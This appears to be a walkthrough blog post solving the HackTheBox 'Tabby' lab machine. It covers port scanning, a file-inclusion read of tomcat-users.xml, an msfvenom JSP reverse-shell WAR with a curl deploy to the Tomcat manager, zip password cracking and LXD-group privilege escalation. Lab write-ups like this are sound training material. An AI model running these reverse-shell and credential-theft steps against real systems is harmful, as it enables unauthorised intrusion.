Tabby Walkthrough

Hey folks, Here we come back again to continue HackTheBox machines series with “Tabby” machine, before we get started let’s take a look at the machine's info

As you can see it’s easy but in my opinion, it should be medium because it has in every step something new and seems to be hard for beginners, let’s get started…

We will work on it without Metasploit

As usual, we will begin our walkthrough with nmap scan to get all open ports and service running on them, let’s perform a standard scan

    22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Mega Hosting
    8080/tcp open  http    Apache Tomcat
    | http-methods: 
    |_  Supported Methods: OPTIONS GET HEAD POST
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-title: Apache Tomcat

We have 22/80/8080 are open and services apache 2.4.41 / openssh 8.2p1 /apache tomcat so what we will do ?

  1. Try to search for exploits in apache 2.4.41 by using searchsploit tool

  2. Try to brute-force ssh credentials by using nmap scripts and brutespray tool

  3. Try to brute-force tomcat credentials by using metasploit and nmap scirpts

  4. Try to enumerate websites at and and content discovery by using dirbuster/dirsearch/ffuf/gobuster

Let’s start…


We will try to enumerate the services to get the misconfigurations and vulnerabilities.

Public exploitation

I’ve searched for public exploitation in exploit-db and rapid-7 and public websites for exploitation for apache 2.4.41 / openssh 8.2p1 but unfortunately nothing we found

For Tomcat we found exploitation at rapid-7 and exploit-db but we must know tomcat credentials and the manager path, so we will need it later not now

SSH Credentials

I’ve brute-forced ssh credentials by using nmap and brutespray but nothing useful!!

Tomcat login credentials brute force

I’ve brute forced the credentials but also nothing useful, we used metasploit

Check the method at Metasploit

Website Enumeration and content discovery

At first I will open

Nice, we have a website that seems like more websites in real life, and it seems like hosting websites so let’s discover it and check its source code

While checking the source code we found this link megahosting.htb/news.php?file=statement‌ so we need to add this domain megahosting to the /etc/hosts by adding it like this line to the /etc/hosts file megahosting and then we will access the upper link

let’s search for megahosting exploit as Google, it may be affected by custom exploitation.

We have found this one


Until now we don’t know our version, so let’s try this exploit in the upper link megahosting.htb/news.php?file=statement‌

Good, it’s vulnerable also.

Let’s try to get any information from tomcat directories, it may have sensitive information

After some enumeration, I’ve found a bunch of directories in these links

and also search for the tomcat-users.xml location file and found it in them, so let’s try to open all of them by using burp intruder or anything else

/var/share/tomcat9/etc/tomcat-users.xml is available and has credentials for the admin-gui and manager-script so let’s take these credentials and try to upload a reverse payload

Note: one of the privileges of admin-gui and manager-script is to deploy files on the server, so we will create a reverse payload and then deploy it

reverse shell payload → msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.war
deploy your payload → curl --upload-file <path/to/shell.war> "http://megahosting:8080/manager/deploy/text?path=/shell&update=true"

and then you can access it by open nc <port-number> and access the webpage megahosting:8080/shell

So for now we’re into the server but not in the user role, so let’s discover our privileges by opening the uses directories

We can’t open the user directory, so let’s try to get more privileges by searching for any important directories or files

After some enumeration, I found this backup file in /var/www/html/files

So I will try to download it on the local machine and look at its content

We will transfer it by opening a server on the vulnerable machine and accessing it from the attack machine

Vulnerable machine > python3 -m http.server 80Attack machine > wget

Now we have it on our attack machine, let’s try to unzip it by unzip file-name

It’s protected by a password, so you can use hashcat or john the wripper to crack the password, I’ll use fcrackzip because it doesn’t take much time

And we have the password admin@it

After trying to unzip the file I found nothing useful inside it so let’s use the password in other way

Let’s try to use it to login as ash user → su ash and insert this password

Good we have more privileges now but not the user privileges so let’s grab the user.txt first

Good, for now let’s try to find anything led us to the root access.

If you noticed the ash user is in lxd group

So after some google searching about how to use this role to be a root user, I’ve found an awesome resource to do it

Before we follow this resource let’s get first interactive shell because it will not work on the normal shell

python -c 'import pty; pty.spawn("/bin/bash")'

It will get you in the interactive shell to be manage to access lxd then do as this man do exactly

As you will find in the upper link I’ve downloaded the tar file and transfer it to the vulnerable machine as you can see

After that, I compiled it on the victim machine and create an image

The final step is to access the image which we create

Let’s get our root.txt from the root directory

There’s nothing in this directory

It seems that he’s kidding me :)

Let’s search for the flag in all directories

After some search, I’ve found ❤

Last updated